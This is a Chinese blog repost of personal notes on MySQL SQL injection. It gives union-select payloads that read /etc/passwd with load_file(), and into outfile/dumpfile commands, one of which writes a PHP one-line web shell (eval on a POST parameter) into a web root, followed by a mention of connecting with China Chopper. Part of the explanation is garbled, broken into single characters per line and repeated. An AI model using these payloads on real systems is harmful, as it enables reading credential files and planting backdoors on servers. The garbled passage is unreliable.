数据库笔记2
2021/6/21 2:26:26
本文主要是介绍数据库笔记2,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
load_file()函数 读文件操作
前提:
知道文件绝对路径
能够使用union查询
对web目录有写权限
union select 1,load_file(’/etc/passwd’),3,4,5,6#
union select 1,load_file(如果引号被过滤可以用16进制),3,4,5,6#
into outfile()写文件操作
前提:
文件名必须全路径(绝对路径)
用户必须有写文件的权限
没有对’引号过滤
select ‘<?php phpinfo?>’ into outfile ‘绝对路径’
select ‘12345’ into outfile ‘d:/2.txt’
into dumpfile()写文件操作 支持二进制读写
select ‘12345’ into dumpfile ‘d:/3.txt’
select ‘<?php eval($_POST[1]);?>’ into outfile ‘d:/phpstudy/www/1.php’
在目录d:/phpstudy/www/下新建一个1.php文件内容是<?php eval($_POST[1]);?>
写入一句话木马
P
O
S
T
[
1
]
接
收
p
o
s
t
传
来
的
1
的
参
数
e
v
a
l
(
)
函
数
把
当
前
字
符
串
内
容
当
成
p
h
p
代
码
来
执
行
通
过
P
O
S
T
方
式
在
网
页
中
把
自
己
写
的
代
码
赋
值
给
1
,
然
后
_POST[1] 接收post传来的1的参数 eval()函数 把当前字符串内容当成php代码来执行 通过POST方式在网页中把自己写的代码赋值给1,然后
POST[1]接收post传来的1的参数eval()函数把当前字符串内容当成php代码来执行通过POST方式在网页中把自己写的代码赋值给1,然后_POST函数接收1的值,再通过eval函数就执行自己传送的代码了
通过中国菜刀连接
这篇关于数据库笔记2的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-07-04TiDB 资源管控的对撞测试以及最佳实践架构
- 2024-07-03万字长文聊聊Web3的组成架构
- 2024-07-02springboot项目无法注册到nacos-icode9专业技术文章分享
- 2024-06-26结对编程到底难不难?答案在这里
- 2024-06-19《2023版Java工程师》课程升级公告
- 2024-06-15matplotlib作图不显示3D图,怎么办?
- 2024-06-1503-Loki 日志监控
- 2024-06-1504-让LLM理解知识 -Prompt
- 2024-06-05做软件测试需要懂代码吗?
- 2024-06-0514-ShardingSphere的分布式主键实现